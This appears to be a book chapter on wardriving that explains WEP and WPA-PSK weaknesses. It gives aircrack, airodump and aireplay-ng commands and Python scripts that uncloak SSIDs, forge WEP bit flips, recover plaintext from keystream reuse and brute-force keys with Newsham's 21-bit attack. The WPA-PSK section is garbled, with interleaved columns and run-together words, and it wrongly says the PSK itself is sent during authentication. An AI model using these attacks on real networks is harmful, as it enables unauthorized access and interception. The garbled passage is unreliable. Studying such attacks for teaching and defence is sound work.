Table 2. Properties of the CRC32 function employed in the WEP

Property                     Application
Linearity                    CRC32(A ⊕ B) = CRC32(A) ⊕ CRC32(B)
Independence of WEP key      It is possible to flip bits without being recognized by the WEP

(Strictly speaking, because the standard CRC-32 uses a non-zero initial value and a final XOR, the relation holds up to a length-dependent constant for messages of equal length: CRC32(A ⊕ B) = CRC32(A) ⊕ CRC32(B) ⊕ CRC32(0…0). Since that constant does not depend on the key, the bit-flipping property is unaffected.)

No Encryption

Many wireless networks operate without any encryption, and "security" is delegated to other mechanisms. It must be underlined that the lack of encryption allows everyone to listen to the channel and analyze the traffic, which flows in clear form (if no security mechanisms at higher layers are adopted). Hence, for these users, "security" is solely a synonym of "preventing" unauthorized usage. The most adopted methods are MAC address filtering and hiding the service set identifier (SSID). They will be briefly explained, highlighting why they cannot be perceived as secure countermeasures.

MAC Address Filtering

MAC address filtering is a basic technique implemented in almost all of the commercially available APs. Basically, before authorizing an association, the AP checks the allowed MAC addresses in a white list. The rationale behind the approach relies on the uniqueness of the MAC address. As a matter of fact, this technique only discourages the occasional wardriver, but it is otherwise quite useless. In addition, it could be used jointly with WEP or WPA, in order to have another barrier if an attacker cracks the encryption mechanism. However, frame headers are never encrypted; hence, it is a simple task to retrieve some valid MAC addresses (e.g., by simply monitoring a channel). Then, there are a variety of tools for changing the MAC address of a wireless interface, performing the so-called MAC spoofing.

Hiding the SSID

In order to advertise a network, it is possible to broadcast a special identifier called SSID. The standard allows the user to embed the SSID within beacons sent by APs or wireless routers. In order to "join" a WLAN, you must know its SSID. As a consequence, many users/administrators disable the SSID broadcasting, to prevent unauthorized accesses. However, this measure only prevents a minority of attempts. In fact, there are several tools and techniques that allow a user to uncloak a hidden SSID. A thorough discussion about such tools will be presented in the following sections, but we outline the basic procedures here. Specifically, it is possible to: (1) recover information about the SSID contained in frames sent by other stations in the network; for instance, the SSID is contained in association request packets; and (2) if such frames are not available, it is possible to spoof the IEEE 802.11 de-authentication frames of target clients. This causes a client to start a new authentication and association round with the AP, providing the needed frames.

WEP Encryption

The scientific literature, as well as daily practice, commonly suggest that the WEP is a highly insecure encryption mechanism. No matter the skill of the wardriver, or the quality of the implementation in the AP: a WEP-secured network can be cracked in a period varying from 5 minutes to 1 hour. Moreover, many tools implement automated procedures; thus, cracking the WEP is as simple as pressing a keyboard shortcut.

Understanding the Effective Strength of the WEP

Often, marketing collides with engineering: this is the case of the WEP. In order to understand the effective strength of the WEP, as well as its weak points, let us summarize its basic functionalities. The WEP performs the encryption per packet; let a given packet M represent a message in clear form to be sent. Hence, the following steps happen:

A 32-bit cyclic redundancy check (CRC) algorithm is applied to M in order to produce a checksum. Then: CSum = CRC32(M). Basically, a CRC is introduced to assure message integrity. However, the use of CRC-like codes in this kind of environment has been proven to be very dangerous.

Let us define M' as the message actually processed by the WEP algorithm, hence to be really sent over the channel. M' is depicted in Figure 1.

Figure 1. The message in clear form to be encrypted with WEP: M' = M || CSum, where CSum = CRC32(M)

Then M' is encrypted by using the RC4 algorithm, which is a stream cipher. Thus, the actual Seed used by the WEP is the combination of a 24-bit initialization vector (IV) and the WEP key, as depicted in Figure 2.

Figure 2. The seed used to encrypt packets with WEP: Seed = IV (24 bit) || WEP Key (40 or 104 bit)

Referring to Figure 2, two different WEP keys are available: 40-bit long keys adopted in the standard implementation, or 104-bit long keys adopted in the extended implementation, which has been introduced to prevent brute force attacks. Here comes the marketing: a "64-bit WEP secured network" actually relies only on 40-bit long keys, since 24 bits represent the IV. For the same reason, a "128-bit WEP secured network" only relies on 104-bit keys.

Splitting the Seed in two sub-parts (the IV and the WEP key) is one of the major flaws of the procedure. However, the reason is rooted both in the nature of RC4 and in that of wireless channels. RC4 has been used in the WEP since it is widely adopted and well studied. But its application over wireless channels poses some drawbacks. In fact, wireless channels frequently drop packets, thus maintaining a proper synchronization in the stream to allow the decryption operations is a challenging task. Consequently, to overcome the possibility of packet loss and stream de-syncing, each encrypted packet is sent along with the IV that generates its keystream. This represents another weakness in the algorithm, since it allows a wardriver (attacker) to seamlessly collect IVs.

Concluding, the ciphered text C is provided by:

C = M' ⊕ RC4Key

where ⊕ represents the XOR operator, and RC4Key is the keystream generated by the RC4 algorithm by feeding it with Seed. Figure 3 depicts a WEP-encrypted packet that could be collected and exploited by a wardriver. Needless to say, IVs convey precious information, and in the following, we show how standard tools can exploit this.

Figure 3. A WEP-encrypted frame: IV (24 bit) || C. Notice that the IV is sent as cleartext.
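The two uncloaking procedures described under Hiding the SSID work because the SSID is an ordinary tagged parameter of management frames: a cloaked beacon carries an empty (or all-zero) SSID element, while an association request from a legitimate client carries the real one. The following Python script is an added example, not code from this chapter or from any of the tools it mentions; it builds both frames from constructed data (the MAC addresses, the BSSID and the SSID "HomeNet" are made up), parses the tagged parameters of each, and shows a passive sniffer recovering the hidden SSID. Only the standard library is used.

```python
import struct

# IEEE 802.11 management subtypes (frame type 0) and the length of the fixed fields
# that sit between the 24-byte header and the tagged parameters (IEs) in each.
ASSOC_REQ, PROBE_RESP, BEACON = 0x0, 0x5, 0x8
FIXED_LEN = {ASSOC_REQ: 4, PROBE_RESP: 12, BEACON: 12}
BROADCAST = b"\xff" * 6


def mgmt_frame(subtype, addr1, addr2, addr3, fixed, ies):
    """Build a management frame: header, fixed fields, then tag/length/value elements."""
    frame_control = struct.pack("<H", subtype << 4)   # version 0, type 0 (mgmt), subtype
    header = frame_control + b"\x00\x00" + addr1 + addr2 + addr3 + b"\x00\x00"
    body = b"".join(bytes([tag, len(value)]) + value for tag, value in ies)
    return header + fixed + body


def ssid_from_frame(frame):
    """Return (bssid, ssid) for a beacon, probe response or association request;
    ssid is None when the SSID element is missing or cloaked (empty or all zeros).
    Returns None for frames that are not one of these management frames."""
    (fc,) = struct.unpack_from("<H", frame, 0)
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    if ftype != 0 or subtype not in FIXED_LEN:
        return None
    bssid = frame[16:22]                      # address 3 carries the BSSID here
    pos = 24 + FIXED_LEN[subtype]
    while pos + 2 <= len(frame):
        tag, length = frame[pos], frame[pos + 1]
        value = frame[pos + 2 : pos + 2 + length]
        if tag == 0:                          # element ID 0 is the SSID
            if length == 0 or value == bytes(length):
                return bssid, None
            return bssid, value.decode("utf-8", "replace")
        pos += 2 + length
    return bssid, None


def learn_ssids(frames):
    """Passive uncloaking: merge what every captured management frame reveals per BSSID."""
    known = {}
    for frame in frames:
        parsed = ssid_from_frame(frame)
        if parsed is None:
            continue
        bssid, ssid = parsed
        if ssid is not None or bssid not in known:
            known[bssid] = ssid
    return known


# Constructed sample capture (made-up addresses and SSID).
AP = bytes.fromhex("00aabbccddee")
STA = bytes.fromhex("001122334455")
CLOAKED_BEACON = mgmt_frame(
    BEACON, BROADCAST, AP, AP,
    bytes(8) + struct.pack("<HH", 100, 0x0411),        # timestamp, interval, capability
    [(0, b""), (1, b"\x82\x84\x8b\x96"), (3, b"\x06")])  # empty SSID, rates, channel 6
ASSOC_REQUEST = mgmt_frame(
    ASSOC_REQ, AP, STA, AP,
    struct.pack("<HH", 0x0411, 10),                     # capability, listen interval
    [(0, b"HomeNet"), (1, b"\x82\x84\x8b\x96")])        # the client names the network

if __name__ == "__main__":
    print(ssid_from_frame(CLOAKED_BEACON))              # the beacon hides the SSID
    print(learn_ssids([CLOAKED_BEACON, ASSOC_REQUEST]))  # the client's frame reveals it
```

The second procedure of the text (spoofed de-authentication) only serves to make a client re-send the association request that this parser reads; capturing probe responses to a directed probe request works the same way, since they carry the SSID in the same element.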

WPA Encryption

As previously explained, WPA encryption schemes have been introduced to overcome the drawbacks of the WEP. The WPA exists in two different flavors: 802.1X authentication jointly used with the temporal key integrity protocol (TKIP), intended for enterprises, and the less secure pre-shared key (PSK) mode, also jointly used with TKIP. The 802.1X + TKIP combination is a quite secure protocol, and difficult to crack by wardrivers, but the PSK version still has some flaws. The WPA has proved to be quite secure so far; thus, we will omit its details in this chapter.

Some Considerations about Layer 1 Security

All the aforementioned encryption mechanisms have been introduced to cope with the simplicity of sensing a WLAN and, consequently, of collecting data. In fact, it is hard to implement OSI layer 1 security mechanisms, as is possible in wired networks. However, a basic countermeasure could be exploited: adjusting the wireless power. Conversely, wardrivers can adopt high gain antennas to intercept distant APs. Those concepts will be further discussed.

Wireless Power

Many APs allow changing the power employed for transmitting data. However, many users keep the default values or use more power than required. Besides the waste of energy, this also raises some security risks. For instance, if there is the need of covering a conference room, it is harmful to irradiate more than the required power, resulting in the chance of detecting (and using) the WLAN also from outdoors. This is at the basis of wardriving. In fact, wardrivers will seldom enter private areas; rather, they will station in streets and public places, capitalizing on the unsolicited wireless coverage. Then, as a rule of thumb for protection, it could be useful to irradiate only the required power: no more, no less.

Antenna Gain

As said, wardrivers often utilize high gain antennas to reach distant networks. Thus, reducing the transmission power of the APs might not be enough.

Commonly, there are several techniques to replace the standard antenna available at the network interface, but they are out of the scope of this work. The simplest technique is to use an external PCMCIA wireless card equipped with a connector for an external antenna. One of the most interesting accessories is the pigtail. The pigtail is a converter allowing the user to connect high gain antennas to a wireless card, even if the terminal connectors are different (e.g., wireless cards often have MC-Card, MMCX or RP-MMCX connectors).

WEP ATTACKS

As discussed in the Understanding the Effective Strength of the WEP section, WEP offers different alternatives to be attacked and cracked. In this section, we will introduce the most popular attacks, and then we will present some practical examples. Besides, attacks could be roughly grouped in two categories: passive and active. A passive attack solely relies on the traffic collected, while an active attack consists also in injecting some additional traffic in the network. For instance, active attacks are employed to stimulate traffic to collect if there are not any clients connected to an AP at a given time. The latter techniques will be presented when needed, that is, in the Examples section.

Bruteforce Attacks

Every security algorithm is exposed to bruteforce attacks. The key point is whether a bruteforce attack is feasible. As said, WEP exists in two variants. Concerning the 40-bit standard implementation, a bruteforce attack could be feasible. Probably, an occasional attacker will have a machine allowing to check 10,000 to 15,000 keys/second; hence, it is not sure that he/she will complete the attack (exhausting the 2^40 ≈ 1.1 · 10^12 keys at that rate takes roughly 850 to 1,270 days; half of that is needed on average). But an organization or a professional attacker can try to successfully bruteforce the WEP in the 40-bit variant. Nevertheless, nowadays there are several software libraries for parallelizing computations, as well as software tools for building clusters (e.g., Beowulf or Mosix for the Linux platform and XGrid for Mac OS X). Owing to the availability of the source code of bruteforcing tools, porting them to such frameworks could be possible. Actually, bruteforce is never employed, since it is possible to successfully crack the WEP in simpler and quicker ways.

Conversely, the 104-bit long key available in the WEP extended implementation is immune against bruteforce attacks (with standard gear, about 10^19 years are needed).

Tim Newsham's 21-bit Attack

Tim Newsham is a well-known security expert and consultant. Among wardrivers he is very popular for inventing the 21-bit attack (Newsham, 2003), allowing to bruteforce some WEP implementations in minutes.

Basically, Newsham noticed that several vendors generate WEP keys from text, in order to make easy-to-use products and cover a wider market range. Usually, the user must insert a passphrase, something like "Ken sent me", and the wizard will automatically generate a WEP key. However, many generators appear to be flawed. He discovered that two steps in the generation process reduce the "strength" of the key; specifically:

1. The ASCII mapping reduces the entropy: usually ASCII strings are folded (by XOR) into a 32-bit seed value. Since the highest order bit of each ASCII character is zero, the XOR guarantees four zero bits (one per byte of the seed). Then, only seeds from 00:00:00:00 to 7f:7f:7f:7f can occur.
2. The use of a pseudo random number generator (PRNG) reduces the entropy: for each 32-bit output, only a portion of the available binary word is considered (e.g., bits 16 through 23). Besides, the generator has the property of producing bits with different degrees of "randomness": the k-th lowest bit repeats with a cycle length of only 2^k. Then, Newsham noticed that the produced key bytes have a cycle length of 2^24, so that only the low 24 bits of the seed matter, i.e., seeds ranging from 00:00:00:00 to 00:ff:ff:ff.

In order to discover the key, it is sufficient to consider seeds ranging from 00:00:00:00 through 00:7f:7f:7f with zero highest order bits, hence reducing the space and only analyzing 2^21 words. As a consequence, it is possible to bruteforce such flawed implementations in minutes. The most popular implementation of Newsham's 21-bit attack is available in the KisMAC tool. According to KisMAC documentation, Linksys and D-Link devices appear, at the moment, the most vulnerable to this attack.

Weak IVs

This attack relies on how RC4 is used to produce a WEP-encrypted stream. Basically, some IVs can reveal some information about the secret key through the first byte of the keystream. Then it is enough to collect a sufficient number of weak IVs and, if the first byte of the keystream is known, it is possible to retrieve the key.



Regarding the collection of the first byte of the keystream, the IEEE 802 standard gives some useful hints. In fact, the payload of IEEE 802.11 data frames always begins with the SNAP field, which most of the time is set to 0xAA. Then it is sufficient to collect weak IVs that come in the form:

(Y + 3, 255, X)

where Y is the index of the key byte under attack, the second value is 255 (that is, N − 1, since RC4 works modulo N = 256), and X can be any value. Fluhrer, Martin, and Shamir (FMS) have developed an efficient attack available in different tools. However, the core of the attack is out of the scope of this chapter.

As a concluding remark, new devices tend to avoid generating weak IVs. In fact, hardware developers better engineer their devices, paying increased attention to the IV generation mechanism.

Keystream Reuse

Suppose to be in the following scenario: two different cleartext messages, M'1 and M'2, must be transferred over the channel. Let us assume that both messages share the same keystream. Then:

C1 = M'1 ⊕ RC4Key(Seed)
C2 = M'2 ⊕ RC4Key(Seed)

C1 and C2 are the two WEP-encrypted messages, and Seed is the one employed for RC4, as depicted in Figure 2 of the Understanding the Effective Strength of the WEP section. Then, it is possible to perform the following operation:

C1 ⊕ C2 = (M'1 ⊕ RC4Key(Seed)) ⊕ (M'2 ⊕ RC4Key(Seed)) = M'1 ⊕ M'2   (1)

As a consequence, knowing M'1 (or M'2) allows one to recover M'2 (or M'1). One might argue that the knowledge of a message M'x is a tight hypothesis. However, messages being packets generated by some well-known protocol, it is possible to craft packets and send them via the Internet to a target host on the WLAN. Hence, the AP will encrypt the data for the attacker.

This kind of attack relies on relation (1). However, the operations in (1) are possible since both messages have been encrypted with the same Seed. To overcome this, IVs have been introduced, being the only portion of the Seed that varies. Alas, IVs are only 24 bits long, hence it is likely that the same Seed will be used over the network again.

The Oracle

In order to recover a relevant amount of known plaintext, the AP could be used as an Oracle, a device that unconsciously encrypts well-crafted packets for the attacker.

Figure 4 depicts the basic operations performed to conduct the attack. This attack is nowadays unlikely, since as explained, there are several faster and simpler ways to crack the WEP. Basically, the attacker exploits an active connection targeting the victim. Then he/she sends (e.g., via General Packet Radio Service [GPRS], or Universal Mobile Telecommunications System [UMTS], or similar) known packets that will be encrypted by the AP before transmission over the WLAN.

Figure 4. Scenario when an oracle attack is performed: the wardriver sends a known packet to the target over the Internet (via GPRS, UMTS, GSM or another WLAN access); the AP encrypts it and transmits the known (now encrypted) packet over the WLAN, where the wardriver captures it.

It becomes clear that this attack exploits the fact that an AP could be used to connect a network to the Internet without any further protection mechanism (e.g., a firewall or virtual private network [VPN] support). For completeness, in early days when GPRS was expensive, usually the attack was performed by cooperating with another wardriver, usually at home, with an active Internet connection remotely injecting packets to the AP.

Decryption Dictionary

This kind of technique is no longer employed, and there are not any proofs that it has ever been exploited in its basic form. However, it is interesting that this attack allows (at least theoretically) the user to decrypt all the traffic without knowing the WEP key. Basically, it is sufficient to build a table of the intercepted keystreams. Then, it is possible to compile a table of all the possible values (and also skip the RC4 phase). The drawback, preventing its proficient exploitation, is the space required for this kind of attack. In fact, the encrypted stream is 1,500 bytes long at maximum, owing to the maximum MTU available, and the adoption of a 24-bit IV produces 16,777,216 (2^24) possible streams. Hence, the required space is 16,777,216 · 1,500 bytes ≈ 23.4 Gbytes.

With the advent of PCMCIA cards, and their poor implementation of the policies to generate IVs, the adoption of a dictionary-based attack became feasible. In fact, many PCMCIA wireless cards reset the IV to 0 each time they are re-initialized. Re-initialization happens each time they are activated (e.g., typically once a day in many circumstances). Then it is sufficient to build a dictionary only for the very first values of IVs, in order to decrypt most of the flowing traffic.

Examples

In this section, we will briefly present some possible attacks against a WEP-secured network. Firstly, we will show how to attack a network by using KisMAC, a tool running on Mac OS X with a simple GUI. Then we will show how to use standard terminal-based tools commonly available for different Unix flavors. As a remark, we will not spend too much time on explaining bruteforce or dictionary attacks. In fact, WEP could be cracked in a more elegant way; conversely, owing to its better security, we will explain bruteforcing and dictionary attacks in the section devoted to WPA. Such concepts could be straightforwardly extended also to WEP.

WEP Attack via KisMAC

Let us show an attack performed on a WEP-secured network. Firstly, we show how to crack a network with KisMAC. This gives an idea of how simple it might be. After launching KisMAC, one can start the scanning. If supported, one can select whether or not to adopt passive or active scanning. Figure 5 depicts the result of a scan.

Figure 5. Scan result provided by the KisMAC tool

Then, if there is the need of cracking the WEP, different actions could be performed. Firstly, one can try Newsham's 21-bit attack, or try to bruteforce the WEP, but owing to the "information" conveyed by the IVs, quicker solutions could be adopted.

Two things may happen: (1) the network is experiencing a huge amount of traffic, hence producing a huge amount of IVs. In this perspective, an attacker must only wait to collect a sufficient number of IVs to perform a suitable attack; or (2) the network is under a low load, hence the time needed to collect a sufficient amount of IVs is non-negligible. Then, it is possible to stimulate traffic by using the de-authentication attack or injecting well-crafted packets; Figure 6 depicts possible attacks to stimulate traffic, while Figure 7 depicts the "fake" stations that populate the attacked wireless network.

Figure 6. How to stimulate traffic in a WEP-secured network

Figure 7. The network has been attacked with an authentication flood. Notice the random MAC addresses.

WEP Attack via Terminal-Based Tools

Firstly, let us start searching a network. For doing this, let us use airodump. Airodump allows to collect traffic from a wireless interface. It could be possible that you have airodump-ng instead, since it represents the evolution of the aircrack wireless suite. We will refer to the classical tool, since it could be possible that you already have it, especially if your configuration is not up-to-date; however, the concepts, as well as its usage, are the same.

Supposing the tool properly installed, it is sufficient to type in a terminal:

Mud:Luca$ ./airodump cardName theTrafficFile 0 loggingMode

Here, ./airodump launches the tool, cardName is the name of the card used to monitor the air, and theTrafficFile is the output file collecting data. The parameter 0 specifies that we want to hop channels, while loggingMode allows to switch between logging all traffic or only IVs.

If we have collected enough IVs, we can try to crack the WEP by using aircrack. A couple of remarks: (1) the traffic collection and the cracking phases are decoupled. Then you can perform an attack off-line (not hidden in a parking lot); (2) it is possible to collect data with well-known sniffers, such as Wireshark (formerly known as Ethereal). For instance, under Linux it is possible to use airmon-ng to configure the wireless card, then use Wireshark to collect traffic. By using ivstools from the aircrack-ng suite you can convert IVs from .pcap format to aircrack's own format.

Then, you can crack a network by typing:

Mud:Luca$ ./aircrack -b MAC theTrafficFile

Here, -b MAC specifies the MAC address (or the BSSID) of the target network. In fact, your dump could have collected traffic from different networks. The needed number of IVs varies: if your traffic dump is blessed, collecting 100,000 IVs suffices. Usually, the needed number of IVs ranges from 250,000 to 500,000. However, some advanced APs have algorithms that avoid the generation of weak IVs, hence resulting in a huge number of needed IVs (in the order of several millions).

If there is not enough traffic on the network, collecting IVs could be a tedious (or at least time consuming) task. Moreover, if a sophisticated AP is employed, collecting 500,000 IVs with a traffic of a few packets per second could be impossible. Then, it is possible to stimulate traffic on the WLAN, in order to increase the number of packets sent, hence speeding up the collection of IVs.

For instance, by using the aircrack suite, it is possible to exploit the so-called address resolution protocol (ARP) replay.² Roughly, ARP relies on broadcasting a request (an ARP Request) for an IP address, in order to discover the matching between L2 and L3 addressing. The device that recognizes its IP address sends back a reply directly to the original requestor. Alas, WEP does not assure protection against replay attacks. So you can capture an encrypted ARP request (recognizable by its fixed size, without needing the key), re-inject it repeatedly, and collect the answers, each of which carries a fresh IV. Needless to say, the more aggressive your ARP re-injection strategy is, the more packets you will collect (thus reducing the time needed to collect a certain amount of valid IVs).

To perform an ARP replay attack you can use the tool as follows (notice that you must also have a sniffer running in order to capture the replies).

Mud:Luca$ ./aireplay-ng --arpreplay -b MACAP -h TMAC Interface

./aireplay-ng launches the tool, the --arpreplay flag specifies to perform the ARP replay attack, -b MACAP specifies the MAC address of the AP and -h TMAC specifies the MAC of the target (victim) host, used as the source address of the injected frames. Lastly, Interface tells the program which wireless interface must be used.

If everything is correct, the attack starts generating more traffic.
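The following Python model is an added example (not code from this chapter, from KisMAC or from the aircrack suite) that ties together, on one constructed frame, the WEP encapsulation of the Understanding the Effective Strength of the WEP section, the bit-flipping property of Table 2, the keystream-reuse relation (1) of the Keystream Reuse section, and Newsham's 21-bit attack. The key generator is a reconstruction of the flawed passphrase-to-key scheme described in the Tim Newsham's 21-bit Attack section (ASCII bytes XOR-folded into a 32-bit seed, a Microsoft rand()-style linear congruential generator, bits 16 to 23 of each output taken as a key byte); its constants are an assumption, as are the sample passphrase, IV and payload. The search needs no knowledge of the key: it tries the 2^21 candidate seeds until one decrypts the captured frame to an ICV-valid payload that starts with the SNAP bytes.

```python
import os
import zlib

SNAP = bytes.fromhex("aaaa03")      # LLC/SNAP prefix of every WEP-protected payload
LCG_A, LCG_C = 0x343FD, 0x269EC3    # assumed MS rand()-style LCG of the flawed generators


def rc4(key, length):
    """RC4 keystream (KSA + PRGA) of `length` bytes for `key`."""
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def crc32(data):
    return zlib.crc32(data).to_bytes(4, "little")   # WEP ICV: CRC-32, little-endian


def wep_encrypt(key, iv, msg):
    """Figures 1 to 3: frame = IV || (M || CRC32(M)) XOR RC4(IV || key)."""
    m2 = msg + crc32(msg)
    return iv + xor(m2, rc4(iv + key, len(m2)))


def wep_decrypt(key, frame):
    """Return (icv_ok, M) for a frame produced by wep_encrypt."""
    iv, c = frame[:3], frame[3:]
    m2 = xor(c, rc4(iv + key, len(c)))
    return m2[-4:] == crc32(m2[:-4]), m2[:-4]


def flip_bits(frame, delta):
    """Table 2: flip the bits set in `delta` (len(M) bytes) without the key. CRC32 is
    affine, crc(M ^ D) = crc(M) ^ crc(D) ^ crc(zeros), so the ICV can be patched too."""
    fix = xor(crc32(delta), crc32(bytes(len(delta))))
    return frame[:3] + xor(frame[3:], delta + fix)


def keystream_reuse(c1, c2, m1):
    """Relation (1): C1 ^ C2 = M'1 ^ M'2 when two frames share the IV (same seed)."""
    assert c1[:3] == c2[:3], "different IVs: keystreams differ"
    return xor(xor(c1[3:], c2[3:]), m1 + crc32(m1))[: len(m1)]


def passphrase_seed(passphrase):
    """Generator step 1: XOR-fold the ASCII bytes into four seed bytes (little-endian)."""
    b = [0, 0, 0, 0]
    for i, ch in enumerate(passphrase.encode("ascii")):
        b[i % 4] ^= ch
    return int.from_bytes(bytes(b), "little")


def key_from_seed(seed):
    """Generator step 2: the five key bytes are bits 16..23 of successive LCG outputs."""
    key = bytearray()
    for _ in range(5):
        seed = (seed * LCG_A + LCG_C) & 0xFFFFFFFF
        key.append((seed >> 16) & 0xFF)
    return bytes(key)


def newsham_candidates():
    """The only 2**21 seeds worth trying: bit 7 of every byte is 0 (ASCII), and seed
    bits above 23 never reach bits 16..23 of the LCG output (carries only move up)."""
    for n in range(1 << 21):
        yield (n & 0x7F) | ((n >> 7) & 0x7F) << 8 | ((n >> 14) & 0x7F) << 16


def newsham_recover(frame):
    """Newsham's 21-bit attack: return the candidate key that decrypts one captured
    frame to an ICV-valid payload starting with the SNAP bytes."""
    for seed in newsham_candidates():
        key = key_from_seed(seed)
        ok, msg = wep_decrypt(key, frame)
        if ok and msg.startswith(SNAP):
            return key
    return None


if __name__ == "__main__":
    key = key_from_seed(passphrase_seed("Ken sent me"))   # the chapter's sample passphrase
    iv = os.urandom(3)
    msg = SNAP + b"GET /index.html"
    frame = wep_encrypt(key, iv, msg)
    # Table 2: rewrite "index" into "admin" inside the ciphertext; the ICV still verifies
    delta = bytes(8) + xor(b"index", b"admin") + bytes(5)
    print(wep_decrypt(key, flip_bits(frame, delta)))
    # relation (1): a second frame under the same IV leaks its plaintext
    other = wep_encrypt(key, iv, SNAP + b"GET /secret.txt")
    print(keystream_reuse(frame, other, msg))
    # Newsham: walks the 2**21 space; roughly a minute in CPython for this passphrase
    print(newsham_recover(frame) == key)
```

Running the script prints the tampered-but-valid decryption, the recovered second plaintext, and True once the reduced-space search returns the key. Two points worth noting: the bit flip and the keystream-reuse step never touch the key, so no amount of key length helps against them; and since only 21 bits of entropy survive the generator, any oracle able to verify a candidate key (a single captured frame suffices) defeats such products regardless of how long the passphrase is.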



wPA-Psk AttAcks The core of the exploit is based on the hand-


shake for the following reason. Prior to starting
WPAexistsindifferentavors: fl forenterprises
a secure and communication, the key must be sent
for home security. It offers many improvements over an insecure channel. Needles to say, to avoid
compared to the WEP. Firstly, IVs are still adopted, sending the password in cleartext, thus resulting
but IVs are 48-bit long, preventing from IVs reuse in a huge security breach in the procedure, there
or IVs collision. Secondly, IVs are checked before using them to encrypt packets.

The solution that WPA proposes for enterprises is barely adequate to discourage any wardriving activities, but the version for home security could be compromised. As a remark, the WPA suite does not offer the ultimate toolkit for security.

As said, a consumer version of WPA exists, and it is called WPA-PSK. Roughly, WPA-PSK performs steps similar to WEP, but it is more robust. Needless to say, owing to its easy set-up and cost-effective implementation, it is often adopted as the basis of corporate security infrastructure. The main characteristic of WPA-PSK that could be exploited by wardrivers is the “PSK portion” of the procedure. In the PSK, as the acronym suggests, the secret key is pre-shared, hence known a priori and stored in the equipment. However, WPA-PSK during normal operations has some logic to change the codes, making breaking into the system harder work.

In order to stick with the topic of wardriving, we will only explain the unique attack proven to be effective against WPA-PSK.

The Handshake Attack

The basis of this attack is rooted in how the PSK is engineered. The PSK relies on a user-defined password to initialize TKIP. From the attacker’s point of view, TKIP is quite strong, owing to its “per packet” nature; the wardriving community has not yet found out how to crack it. As a consequence, in order to gain access to a WPA-PSK network, a direct attack on TKIP will not give any reasonable results.

However, there is a weak point in the chain: the authentication. In fact, during the authentication, the requestor sends the PSK to spawn the TKIP procedure that will cover the rest of the transmission. There are several mechanisms (outside the scope of this chapter) employed to transmit the passphrase over the channel.

However, if a complete handshake is collected, it is possible to bruteforce the handshake procedure and to recover the password. This attack has two main drawbacks (or advantages, depending on the viewpoint):

1. It is based on a bruteforce technique. If the password is strong enough, it is quite impossible to retrieve;
2. A complete handshake is needed. Without such information, all the traffic collected (even if several Gbytes) is useless.

To overcome the previous drawbacks, some countermeasures are possible. Concerning 1), in presence of a good dictionary that is not limited to standard words but also contains some well-known consumers’ passwords, it is possible to bring a bruteforce attack into a feasible zone for some particular deployments (e.g., home networks, where users tend to use weak passwords). Regarding 2), it is possible to force de-authentication of clients to collect the needed handshake traffic. However, at least one client must be present in the network to perform this attack. Besides, as explained previously, a wireless interface with packet injection capabilities is needed.

Example

In the Weak IVs section we showed some examples using the KisMAC software. KisMAC has a complete GUI, hence performing this attack solely implies selecting it from the menu, as shown in Figure 8.

Notice that the Wordlist Attack against the WPA key is available only if a complete handshake has been collected.
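Drawback 1) above leaves the passphrase as the only barrier once a handshake has been captured. The following check, added here as an example and not code from the chapter, tests a candidate WPA-PSK passphrase against the kind of wordlist the text describes (standard words plus well-known consumer passwords, with l33t-style variants normalized); the wordlist, the substitution map and the 20-character threshold are constructed assumptions.

```python
"""Check whether a WPA-PSK passphrase would fall to a wordlist attack.

Added example: the wordlist, the leet substitution map and the length
thresholds are constructed assumptions for illustration, not a tool from
the chapter.
"""
import re

# Constructed wordlist: standard words plus "well-known consumer" passwords
# (default SSIDs are included because they are popular passphrases too).
WORDLIST = {
    "password", "tsunami", "linksys", "admin", "letmein", "qwerty",
    "welcome", "summer", "football", "internet", "wireless",
}

# Reverse l33t mapping: "p4$$w0rd" -> "password".
LEET_MAP = str.maketrans({
    "4": "a", "@": "a", "8": "b", "3": "e", "6": "g", "1": "i", "!": "i",
    "0": "o", "5": "s", "$": "s", "7": "t", "2": "z",
})


def normalize(candidate: str) -> str:
    """Lower-case and undo the common leet substitutions."""
    return candidate.lower().translate(LEET_MAP)


def strip_decorations(word: str) -> str:
    """Drop trailing digits/symbols ("summer2006!" -> "summer") so the base
    word can be looked up."""
    return re.sub(r"[^a-z]+$", "", word)


def base_forms(candidate: str) -> set:
    """All plain-word forms a wordlist with leet variants would try."""
    low = candidate.lower()
    return {
        normalize(low),
        normalize(strip_decorations(low)),
        strip_decorations(normalize(low)),
    }


def in_wordlist(candidate: str) -> bool:
    return any(form in WORDLIST for form in base_forms(candidate))


def classify(candidate: str, min_len: int = 20) -> str:
    """Return 'invalid length', 'wordlist', 'too short' or 'ok'.

    A WPA-PSK passphrase must be 8 to 63 printable ASCII characters. The
    20-character bar for 'ok' is an assumption: long enough that an offline
    run over a collected handshake cannot enumerate the space.
    """
    if not 8 <= len(candidate) <= 63:
        return "invalid length"
    if in_wordlist(candidate):
        return "wordlist"
    if len(candidate) < min_len:
        return "too short"
    return "ok"


if __name__ == "__main__":
    for pw in ("password", "P4$$w0rd!", "L1nksys2005", "Blue-Kettle-9",
               "correct battery staple cactus"):
        print(f"{pw!r}: {classify(pw)}")
```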


Wireless Wardriving

Figure 8. WPA-PSK bruteforce attack when employing KisMAC

Instead of KisMAC, for pedagogical reasons, let us use airodump. Supposing the tool is properly installed, it is sufficient to type in a terminal:

    Mud:Luca$ ./airodump ath1 theTrafficFile 8

./airodump launches the program (./ refers to a local path), ath1 specifies the interface where the traffic must be collected, theTrafficFile specifies the file that will contain the traffic dump, and 8 is the channel to monitor. However, it is possible to force a de-authentication attack by specifying a flag to airodump.

Until there, we have only collected the traffic (and stimulated a complete handshake if needed). Now, it is possible to perform the off-line attack. Most of the tools can exchange data, so it is possible to collect data with airodump and perform the cracking procedure with KisMAC, cowpatty, …

Supposing we want to use aircrack, we will use the tool (from the command line) in a form like:

    Mud:Luca$ ./aircrack -a  -b MAC -w /Dictionary

./aircrack launches the tool, -a specifies the attack, MAC is the MAC address of the AP to attack, and -w specifies the path to a dictionary. For instance, many Unix systems have a minimal dictionary located in /usr/share/dict; you can preliminarily start with this word collection. Notice that if the password is a standard dictionary word, you should change it immediately, since it is very weak and predictable.

